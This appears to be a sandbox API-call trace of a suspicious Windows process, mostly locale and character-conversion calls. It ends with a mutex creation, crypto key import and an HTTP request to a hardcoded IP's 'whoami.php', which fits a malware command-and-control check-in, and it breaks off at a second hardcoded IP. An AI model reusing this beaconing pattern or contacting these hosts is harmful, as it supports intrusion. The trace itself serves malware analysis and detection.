lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0250.419] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x1c7f478, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0250.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x1c7fc50, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x53\xc5\x2a\xa2\x8c\xfe\xc7\x01\xa9\x7a\xaa\x01\xf8\x73\x53", lpUsedDefaultChar=0x0) returned 256 [0250.419] GetLastError () returned 0x7f [0250.419] SetLastError (dwErrCode=0x7f) [0250.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1c7fd50, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0250.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1c7fd50, cbMultiByte=256, lpWideCharStr=0x1c7f6a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ몏ƪĀ") returned 256 [0250.419] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ몏ƪĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0250.419] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ몏ƪĀ", cchSrc=256, lpDestStr=0x1c7f498, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0250.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x1c7fb50, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x53\xc5\x2a\xa2\x8c\xfe\xc7\x01\xa9\x7a\xaa\x01\xf8\x73\x53", lpUsedDefaultChar=0x0) returned 256 [0250.419] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1ad72f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0250.419] GetLastError () returned 0x0 [0250.419] SetLastError (dwErrCode=0x0) [0250.419] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.420] GetLastError () returned 0x0 [0250.420] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.421] GetLastError () returned 0x0 [0250.421] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.422] SetLastError (dwErrCode=0x0) [0250.422] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.423] GetLastError () returned 0x0 [0250.423] SetLastError (dwErrCode=0x0) [0250.424] GetLastError () returned 0x0 [0250.424] SetLastError (dwErrCode=0x0) [0250.424] GetLastError () returned 0x0 [0250.424] SetLastError (dwErrCode=0x0) [0250.424] GetLastError () returned 0x0 [0250.424] SetLastError (dwErrCode=0x0) [0250.424] GetLastError () returned 0x0 [0250.424] SetLastError (dwErrCode=0x0) [0250.424] GetLastError () returned 0x0 [0250.424] SetLastError (dwErrCode=0x0) [0250.424] GetLastError () returned 0x0 [0250.424] SetLastError (dwErrCode=0x0) [0250.424] GetLastError () returned 0x0 [0250.424] SetLastError (dwErrCode=0x0) [0250.426] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0250.428] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x408 [0250.428] _snwprintf (in: _Dest=0x1c7fca8, _Count=0x40, _Format="Global\\Nx%X" | out: _Dest="Global\\Nx133C00C5") returned 17 [0250.428] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\Nx133C00C5") returned 0x40c [0250.428] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x0) returned 0x0 [0250.428] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0250.429] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x77130000 [0250.429] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x74790000 [0250.429] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x74450000 [0250.429] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x73f30000 [0250.430] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x76a40000 [0250.430] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c7fd78 | out: lpWSAData=0x1c7fd78) returned 0 [0250.430] CryptAcquireContextW (in: phProv=0x1ada3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x1ada3e0*=0x5353b0) returned 1 [0250.431] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x413430, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x1c7fd0c, pcbStructInfo=0x1c7fd08 | out: pvStructInfo=0x1c7fd0c, pcbStructInfo=0x1c7fd08) returned 1 [0250.431] CryptImportKey (in: hProv=0x5353b0, pbData=0x501808, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x1ada3e4 | out: phKey=0x1ada3e4*=0x513368) returned 1 [0250.431] LocalFree (hMem=0x501808) returned 0x0 [0250.431] CryptGenKey (in: hProv=0x5353b0, Algid=0x660e, dwFlags=0x1, phKey=0x1ada3e8 | out: phKey=0x1ada3e8*=0x513428) returned 1 [0250.431] CryptCreateHash (in: hProv=0x5353b0, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1ada3ec | out: phHash=0x1ada3ec) returned 1 [0250.431] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x1c7f928, cbSize=0x1c7fd28 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x1c7fd28) returned 0x0 [0250.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1c7f928, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0250.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1c7f928, cbMultiByte=-1, lpWideCharStr=0x539678, cchWideChar=151 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)") returned 151 [0250.431] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0250.431] _snwprintf (in: _Dest=0x1c7fc5c, _Count=0x40, _Format="http://%u.%u.%u.%u:%u/whoami.php" | out: _Dest="http://208.86.13.216:443/whoami.php") returned 35 [0250.527] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://208.86.13.216:443/whoami.php", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x84080300, dwContext=0x0) returned 0xcc000c [0251.588] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1c7fcdc, dwNumberOfBytesToRead=0x40, lpdwNumberOfBytesRead=0x1c7fd1c | out: lpBuffer=0x1c7fcdc*, lpdwNumberOfBytesRead=0x1c7fd1c*=0xe) returned 1 [0251.588] inet_pton (in: Family=2, pszAddrString="95.222.167.189", 